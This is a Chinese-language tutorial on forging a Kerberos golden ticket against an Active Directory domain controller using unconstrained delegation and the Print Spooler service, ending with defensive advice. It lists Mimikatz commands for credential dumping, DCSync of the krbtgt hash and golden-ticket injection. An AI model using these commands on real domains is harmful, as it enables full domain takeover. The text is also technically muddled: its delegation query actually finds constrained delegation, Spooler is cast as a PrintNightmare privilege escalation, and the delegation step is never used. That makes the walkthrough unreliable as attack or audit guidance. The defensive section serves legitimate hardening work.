利用非约束性委派+Spooler打印机服务 制作黄金票据攻击域控

摘要

在域环境安全攻防中，黄金票据攻击是一种高级的渗透技术，它利用了Kerberos认证协议中的漏洞，通过伪造票据获取对域资源的未授权访问。本文将详细阐述如何结合非约束性委派（Unconstrained Delegation）与Spooler打印机服务，制作黄金票据以攻击域控制器（Domain Controller, DC）。我们将从技术原理、环境准备、攻击步骤到防御建议，全面解析这一高级攻击手法。

一、技术原理

1.1 Kerberos认证基础

Kerberos是一种网络认证协议，设计用于在非安全网络中提供强认证。它通过票据（Ticket）机制实现用户身份验证，主要涉及三种票据：TGT（Ticket Granting Ticket）、TGS（Ticket Granting Service）和服务票据（Service Ticket）。

1.2 黄金票据攻击

黄金票据攻击的核心在于伪造TGT。正常情况下，TGT由KDC（Key Distribution Center，通常与域控制器同机）签发，用于向TGS请求特定服务的票据。攻击者若能获取KRBTGT账户的密码哈希，即可伪造任意用户的TGT，进而访问域内任何服务。

1.3 非约束性委派

非约束性委派允许服务账户将被委派用户的TGT转发给其他服务，无需再次认证。若某服务账户被设置为非约束性委派，且攻击者能控制该账户，便可利用其转发任意用户的TGT，为黄金票据攻击提供便利。

1.4 Spooler打印机服务

Spooler是Windows系统中负责管理打印任务的后台服务。它以SYSTEM权限运行，且在某些配置下可能暴露于网络，成为攻击者利用的入口。通过Spooler服务，攻击者可能获取到高权限会话，进而利用非约束性委派进行黄金票据攻击。

二、环境准备

2.1 目标环境假设

• 存在一个Active Directory域环境。
• 域内至少有一台运行Spooler服务的服务器。
• 存在一个被设置为非约束性委派的服务账户。
• 攻击者已获得一定的初始访问权限，如普通域用户权限。

2.2 工具准备

• Mimikatz：用于提取密码哈希、伪造票据等。
• PowerShell或CMD：用于执行命令。
• 远程执行工具（如PsExec）：若需远程操作。

三、攻击步骤

3.1 识别非约束性委派账户

使用PowerShell命令查询域内被设置为非约束性委派的服务账户：

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,servicePrincipalName | Select-Object Name,servicePrincipalName,msDS-AllowedToDelegateTo

3.2 利用Spooler服务提升权限

若Spooler服务暴露于网络且存在漏洞（如CVE-2021-1675/PrintNightmare），攻击者可利用其提权至SYSTEM。具体步骤依赖于漏洞利用细节，一般包括：

1. 生成恶意DLL。
2. 通过Spooler服务加载恶意DLL。
3. 获得SYSTEM权限的shell。

3.3 提取KRBTGT账户哈希

在获得SYSTEM权限后，使用Mimikatz提取KRBTGT账户的NTLM哈希：

# 在Mimikatz中执行
privilege::debug
sekurlsa::logonpasswords
# 或直接提取KRBTGT哈希（若环境允许）
lsadump::dcsync /domain:域名 /user:krbtgt

3.4 伪造黄金票据

使用提取的KRBTGT哈希伪造TGT（黄金票据）：

# 在Mimikatz中执行
kerberos::golden /user:任意用户名 /domain:域名 /sid:域SID /krbtgt:KRBTGT哈希 /ptt

• /user：伪造票据的用户名，可任意指定。
• /domain：域名称。
• /sid：域SID，可通过whoami /user或Get-ADDomain获取。
• /krbtgt：KRBTGT账户的NTLM哈希。
• /ptt：将票据注入当前会话。

3.5 使用黄金票据访问资源

伪造票据后，攻击者可尝试访问域内资源，如通过dir \\DC\C$访问域控制器的C盘，验证票据有效性。

四、防御建议

4.1 限制非约束性委派

• 尽量避免使用非约束性委派，改用约束性委派（Constrained Delegation）或基于资源的约束性委派（Resource-Based Constrained Delegation, RBCD）。
• 定期审计域内委派设置，移除不必要的委派权限。

4.2 加强Spooler服务安全

• 限制Spooler服务的网络访问，仅允许必要的通信。
• 及时应用Microsoft发布的安全补丁，修复已知漏洞。
• 考虑禁用Spooler服务，若业务允许。

4.3 保护KRBTGT账户

• 定期更换KRBTGT账户的密码哈希（需谨慎操作，可能影响域内认证）。
• 实施最小权限原则，限制对KRBTGT账户的访问。

4.4 监控与日志分析

• 启用详细的Kerberos认证日志记录。
• 部署安全信息与事件管理（SIEM）系统，实时监控异常认证行为。
• 定期审查日志，识别潜在的攻击迹象。

五、结语

利用非约束性委派与Spooler打印机服务制作黄金票据攻击域控，是一种高级且复杂的渗透技术。它要求攻击者具备深入的网络协议知识与实战经验。然而，通过理解其技术原理、准备适当的环境、遵循详细的攻击步骤，并采取有效的防御措施，我们不仅能更好地保护域环境安全，还能提升对高级攻击手法的识别与应对能力。在网络安全领域，持续的学习与实践是抵御威胁、保障安全的关键。